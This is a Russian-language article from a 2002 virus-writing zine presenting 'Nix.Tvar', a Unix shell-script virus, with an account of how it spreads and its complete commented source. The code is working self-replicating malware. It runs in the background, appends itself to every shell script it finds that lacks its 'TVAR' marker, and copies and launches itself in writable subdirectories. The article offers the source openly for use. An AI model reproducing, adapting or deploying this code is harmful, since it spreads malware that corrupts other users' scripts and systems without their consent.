╔═════════════════════════════════════════════════════════════════════════════╗
║░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░║
║░█████▌░█████▌░░░░░█▌░░░░░████████▌░░░█████▌██████████▌░░░░░█▌░░░░░█████████░║
║░░███▌░░░███▌░░░░░███▌░░░░░██▌░░████▌░░███▌░██▌░██▌░██▌░░░░███▌░░░░█▌░██▌░██░║
║░░██▌░░░░██▌░░░░░░███▌░░░░░██▌░░░░██▌░░░██▌░█▌░░██▌░░█▌░░░░███▌░░░░▌░░██▌░░█░║
║░░██▌░░░░██▌░░░░░█████▌░░░░██▌░░░░██▌░░░██▌░░░░░██▌░░░░░░░█████▌░░░░░░██▌░░░░║
║░░█████████▌░░░░██▌░██▌░░░░█████████▌░░░██▌░░░░░██▌░░░░░░██▌░██▌░░░░░░██▌░░░░║
║░░██▌░░░░██▌░░░░███████▌░░░██▌░░░░███▌░░██▌░░░░░██▌░░░░░░███████▌░░░░░██▌░░░░║
║░░██▌░░░░██▌░░░██▌░░░███▌░░██▌░░░░░██▌░░██▌░░░░░██▌░░░░░██▌░░░███▌░░░░██▌░░░░║
║░░██▌░░░░██▌░░██▌░░░░░██▌░░██▌░░░░███▌░░██▌░░░░░██▌░░░░██▌░░░░░██▌░░░░██▌░░░░║
║░█████▌░████▌████▌░░░████▌█████████▌░░█████▌░░░████▌░░████▌░░░████▌░░█████▌░░║
║░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░║
║░░░░░░░░░░░░░░░░░░░░░░░░░░░░  issue#2 apr.2002  ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░║
║░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░║
╚═════════════════════════════════════════════════════════════════════════════╝

  --< Лента m0b!Us'a или возвращение зелёных TVAR'ей. Вирии для *.NiX. >--

 ┌──────────────────────────────┐
 │ Имя продукта  : Nix.Tvar     │
 │ Язык исходника: Shell Script │
 │ Дата          : 26.02.2002   │
 │ Автор         : m0b!Us       │
 └──────────────────────────────┘


  by m0b!Us

  Nix.Tvar - это обычный, нерезидентный вирус для *nix. Так как это Bourne
  Shell скрипт, то следовательно и поражает скрипты написанные для sh, bash,
  csh, ksh, etc.

  При запуске инфицированного файла, вирус запускает свою копию фоновым
  процессом,которая выполняет заражение, из-за чего не происходит задержек.
  Копия вируса перебирает все файлы в текущем каталоге, если найден подходящий
  - заражает его, дописывая своё тело в конец жертвы. Если вируc натыкается на
  директорию доступную для записи, он копирует себя в эту директорию и
  запускает сою копию фоновым процессом.Подходящие файлы - первая строка
  которых содержит "!/bin/". В качестве метки использует строку "TVAR".

  В архиве лежит исходник этого виря в *nix кодировке (этот вирь будет
  работать только, если он в юниксовой кодировке).
=======< cut here >=======
#!/bin/sh                        #Путь до интерпретатора
if [ "$1" = ok ] ; then          #Если мы запущены в фоновом поцессе
 for i in *                      #Перебираем все файлы
 do
   if [ -d $i ] ; then           #Если нам попалась директория
    cp $0 $i                     #Копируем себя в эту директорию
    cd $i                        #Переходим в эту директорию
    $0 ok &                      #Запускаем себя фоновым процессом
     cd ..                       #Возвращаемся обратно
   elif [ -n "`head -n 1 $i | grep -s !/bin/`" ] && [ -z "`grep -s TVAR $i`" ] ; then
   #Если первая строка файла содержит "!/bin/" и в файле нет строки "TVAR"
    echo >>$i ; tail -n 17 $0 >>$i  #Дописываем своё тело (18 строк) в конец жертвы
   fi
 done
else     #Если мы не запущены фоновым процессом
$0 ok &  #Запускаем свою копию фоновым процессом
fi
# TVAR #Метка
=======< cut here >=======

 (c) m0b!Us 2002.

  --< ... >--